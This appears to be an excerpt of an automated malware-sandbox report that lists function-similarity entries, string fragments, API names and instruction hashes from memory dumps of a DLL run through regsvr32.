                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                      • API String ID: 0-2100131636
                                                                                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                      • API String ID: 0-2401169580
                                                                                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                      • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                                      • Instruction ID: a88132d639c86fc65013c073b0471989a3fdda1afebd635cfe436b3da1b19445
                                                                                                                                      • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                                      • Instruction Fuzzy Hash: 5C01C422E2DE0189EB508F21F84076523A0FF99B90F54A270DE5E977A0EF7CD8858F01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                      • API String ID: 0-1318892062
                                                                                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                      • API String ID: 0-3477398917
                                                                                                                                      • Opcode ID: 5b73a1a625f2cfc86355e0bd41939d36f11956a340da434ded1f42b2c003968d
                                                                                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                      • Opcode Fuzzy Hash: 5b73a1a625f2cfc86355e0bd41939d36f11956a340da434ded1f42b2c003968d
                                                                                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: JQ$k&($t$v$x\J
                                                                                                                                      • API String ID: 0-1134872184
                                                                                                                                      • Opcode ID: bdc050f96bf44494249bd4848307985b7cf3b13daba02c673abc667a99b0703a
                                                                                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                      • Opcode Fuzzy Hash: bdc050f96bf44494249bd4848307985b7cf3b13daba02c673abc667a99b0703a
                                                                                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                                                                                      • API String ID: 0-2512384441
                                                                                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Qq$bt$vird$+$S
                                                                                                                                      • API String ID: 0-3373980505
                                                                                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale$_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1743167714-0
                                                                                                                                      • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                      • Instruction ID: 656bdf78f756a0662ae2f33d79252437c87e51bb8009ae54fd44d2759b7cc308
                                                                                                                                      • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                      • Instruction Fuzzy Hash: AA617E72F08A869BDA699A61D9443E973D1FBA4301F440577C71DD7280EF7CE4648B03
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: V$@$P9$^_"
                                                                                                                                      • API String ID: 0-1880944046
                                                                                                                                      • Opcode ID: 6e4761af9cbbc7e56b0ebe3f2fd9ebbf1bb807a40d07775ef569cdf1f58d0d70
                                                                                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                      • Opcode Fuzzy Hash: 6e4761af9cbbc7e56b0ebe3f2fd9ebbf1bb807a40d07775ef569cdf1f58d0d70
                                                                                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =_$F)k$b/$syG
                                                                                                                                      • API String ID: 0-3955183656
                                                                                                                                      • Opcode ID: 8e62bb2442717ef834bc9e0d2db0d031a8489eaa3450fb87a3fdc8a088d62545
                                                                                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                      • Opcode Fuzzy Hash: 8e62bb2442717ef834bc9e0d2db0d031a8489eaa3450fb87a3fdc8a088d62545
                                                                                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                      • API String ID: 0-746338152
                                                                                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *i^$MIC$-Z$]2
                                                                                                                                      • API String ID: 0-498664264
                                                                                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >97"$?$LsRW$~x
                                                                                                                                      • API String ID: 0-2554301858
                                                                                                                                      • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                                                                                      • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                                                                                      • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                                                                                      • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: B$EG$QsF$_
                                                                                                                                      • API String ID: 0-784369960
                                                                                                                                      • Opcode ID: 044ffeba6cf6caf628ab0d946c02a3f7d28cd574b6d4e2350068ec5c70ab2904
                                                                                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                      • Opcode Fuzzy Hash: 044ffeba6cf6caf628ab0d946c02a3f7d28cd574b6d4e2350068ec5c70ab2904
                                                                                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                      • API String ID: 0-1363032466
                                                                                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *+_$WSh$\O$#o
                                                                                                                                      • API String ID: 0-1846314129
                                                                                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .B$O$M*K$\<
                                                                                                                                      • API String ID: 0-3225238681
                                                                                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$$$xVO$~O
                                                                                                                                      • API String ID: 0-3655128719
                                                                                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,IW$G$JMg$l
                                                                                                                                      • API String ID: 0-1370644289
                                                                                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$__tzset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3587134695-0
                                                                                                                                      • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                                      • Instruction ID: 54d1d65801ded1e506896da23aff26285a35727a597bb5afef7d206a203a33d0
                                                                                                                                      • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                                      • Instruction Fuzzy Hash: 4F026432E08642CFE7688F29909023D27D2BB64781F64447BD74FA7691EFB8D5598F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$DecodePointer_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175075375-0
                                                                                                                                      • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                                      • Instruction ID: 4166b8b9d2d20f05c8842dbf5ba240512f8ea8ba2f6c308351fb46d1200c5d41
                                                                                                                                      • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                                      • Instruction Fuzzy Hash: 4131D225F0CB434AFB659A61952133A61C19F743C4F1481B6DE4DE7AC6FEACE4108F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlCaptureContext.KERNEL32 ref: 00007FFFE231D357
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFE231D39D
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32 ref: 00007FFFE231D3A8
                                                                                                                                        • Part of subcall function 00007FFFE2316F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFE2317194,?,?,?,?,00007FFFE2316C69,?,?,00000000,00007FFFE23130C0), ref: 00007FFFE2316FCF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2731829486-0
                                                                                                                                      • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                                      • Instruction ID: d9d0e4adb539383be47b6d4fdf906ea6a11529e9313cbfb89aa9c65de7dd01fc
                                                                                                                                      • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                                      • Instruction Fuzzy Hash: 58115426E28A864AE7349B50F8543BA63D5FFE5304F440176E58D92B96EFBDE004CF12
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *4$5F$S^r
                                                                                                                                      • API String ID: 0-3556444313
                                                                                                                                      • Opcode ID: 32f12f089b8a2f529f06453d9d247e753f5514636137a2d7872eb14875660eb0
